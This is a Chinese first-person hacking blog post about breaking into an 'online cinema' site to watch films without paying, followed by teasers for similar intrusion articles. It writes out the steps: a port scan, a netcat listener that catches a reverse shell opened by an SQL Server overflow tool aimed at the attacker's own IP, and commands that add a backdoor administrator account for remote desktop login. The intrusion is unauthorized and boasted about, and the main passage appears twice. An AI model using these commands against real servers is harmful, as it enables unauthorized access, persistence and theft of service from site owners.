黑客入侵“在线影院”全过程1

所属分类: 网络安全 / 黑客入侵 阅读数: 148
收藏 0 赞 0 分享

最近对网上看电影比较感兴趣,于是登录至某“在线影院”。本以为是免费,谁知问我要账号和密码,我可不想为这个掏钱。怎么办?先探探路。对我而言,入侵的过程是充满乐趣的,它刺激着我大脑的每一根神经,让我兴奋无比。我喜欢体味这种思维无拘的感觉,我喜欢沉醉其中。这是黑客营人的风格。于是,X-Scan开始勤恳地跑在了我的桌面上。   

破门:久违的溢出工具   

用X-Scan对该站点的Server扫描结果出来了,开的端口还不少呢:53、80、1433、3389。可并没有报告说发现有弱口令,看来网管还算比较有责任心。但开了3389端口,意味着可以远程登录,这可是微软给所有Windows用户献上的最大的“木马”。   

通过观察,我发现只有在1433端口上下点工夫,想想办法。何不用SQL2溢出工具试试?   

先开一个cmd窗口,祭出宝刀netcat,在命令提示符下敲入“netcat -l -p 99”,监听本地99端口。接着该SQL2出马了。再打开一个cmd窗口,键入“sql2 218.147.*.* 61.157.*.* 0”,其中218.147.*.*是对方IP,61.157.*.*是我自己的IP,回车后提示package sent successful。再回过头去看看监听本地端口的netcat,已经变成了C:\WinNT\system32\_,这就是对方机器的系统文件夹了,看来是成功溢出了,就这么简单。  

我很幸运地得到了对方的一个Shell,而且还是administrator权限的。接下来的操作就轻车熟路了,添加用户,提升权限:在提示符下键入“net user hacker 12345 /add”(在对方机器里创建一个名为hacker,密码为12345的用户),再键入“net localgroup administrators hacker /add”(把用户hacker加入到管理员组),接下来就该是3389远程登录了。  

破门:久违的溢出工具   用X-Scan对该站点的Server扫描结果出来了,开的端口还不少呢:53、80、1433、3389。可并没有报告说发现有弱口令,看来网管还算比较有责任心。但开了3389端口,意味着可以远程登录,这可是微软给所有Windows用户献上的最大的“木马”。   

通过观察,我发现只有在1433端口上下点工夫,想想办法。何不用SQL2溢出工具试试?   

先开一个cmd窗口,祭出宝刀netcat,在命令提示符下敲入“netcat -l -p 99”,监听本地99端口。接着该SQL2出马了。再打开一个cmd窗口,键入“sql2 218.147.*.* 61.157.*.* 0”,其中218.147.*.*是对方IP,61.157.*.*是我自己的IP,回车后提示package sent successful。

再回过头去看看监听本地端口的netcat,已经变成了C:\WinNT\system32\_,这就是对方机器的系统文件夹了,看来是成功溢出了,就这么简单。   

我很幸运地得到了对方的一个Shell,而且还是administrator权限的。接下来的操作就轻车熟路了,添加用户,提升权限:在提示符下键入“net user hacker 12345 /add”(在对方机器里创建一个名为hacker,密码为12345的用户),再键入“net localgroup administrators hacker /add”(把用户hacker加入到管理员组),接下来就该是3389远程登录了。

更多精彩内容其他人还在看

黑客谈MS07-029域名DNS漏洞利用入侵过程

前言: MS07-029,Windows 域名系统 (DNS) 服务器服务的远程过程调用 (RPC) 管理接口中存在基于堆栈的缓冲区溢出。漏洞的前提是没打补丁,开启DNS服务的所有版本WINDOWS 2000 Server和WINDOWS 2003 Server。 今天
收藏 0 赞 0 分享

黑客教你SQL注入Access导出WebShell的方法

热 点: 已经听N个人过说有人已经发现SQL注入Access得到webshell的技术了,也只是听说而已,具体的细节还是不得而知。 最近在看的书中一章提到Jet的安全,然后灵光一闪,呵呵,发现了一种可以利用access导出asp的方法,分享之。
收藏 0 赞 0 分享

一个注射点,一个webshell甚至系统权限

————只要给我一个注射点,无论什么权限,我都给你一个webshell甚至系统权限 声明:本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责。因为 发觉其危害过大,原文已经经过大量删减及修改,即使这样本文的危害性
收藏 0 赞 0 分享

黑客实战:一次简单脚本攻击实例

一、开篇 今天闲着无聊,到本地区的一个社区上转转,那些人污言秽语的,有个帖子还侵犯了一个朋友的版权,跟贴说了那人几句,管理员也不管,实在看不下去了,打算给管理员盆冷水清醒清醒。 二、准备/分析 安全第一,先开个HTTP代理,打开社区的登陆页面,
收藏 0 赞 0 分享

eWebEditor编辑器成网站中的隐形炸弹

站长在使用eWebEditor的时候是否发现,eWebEditor配置不当会使其成为网站中的隐形炸弹呢?第一次发现这漏洞源于去年的一次入侵,在山穷水尽的时候发现了eWebEditor,于是很简单就获得了WebShell。后来又有好几次利用eWebEditor进行入侵的成功经历,这
收藏 0 赞 0 分享

系统泄露密码的入侵攻击分析

WINDOWS访问139端口时自动用当前用户、密码连接,造成泄露用户密码,虽然其密码是加密的,但一样可以用来攻击。   下面是SMB的密码认证方式。   WINDOWS的139口的访问过程,箭头表示数据方向:   1.客户端<---------------
收藏 0 赞 0 分享

看看黑客是怎样使用Google黑掉Windows服务器

在我的《为什么使用Google扫描安全漏洞》的技巧中,我讨论了如何使用Google.com来执行对你的面向公众的服务器的安全扫描――包括Windows、IIS、Apache和(但愿不会如此!)SQL Server。你能使用它得到服务器的信息、包含敏感信息的文件和检测出&ldquo
收藏 0 赞 0 分享

黑客总结的实用的网站渗透步骤

本文是黑客们总结的比较实用的网站渗透的一些步骤
收藏 0 赞 0 分享

一句话木马加密 过护卫神云查杀系统 过shell扫描器

这个一句话木马最近被利用的很多,很多扫描工具扫描不到,不过一些asp版的扫描工具支持扫描eval和execute,如果发现如下代码,请删除,下面就是他们常发的木马后门
收藏 0 赞 0 分享

安全狗下添加用户的另一方法(大量操作实现突破)

这篇文章主要是针对安装服务器安全狗的机器,突破添加用户的操作,用for循环实现,但如果服务器安装了360就无法使用
收藏 0 赞 0 分享
查看更多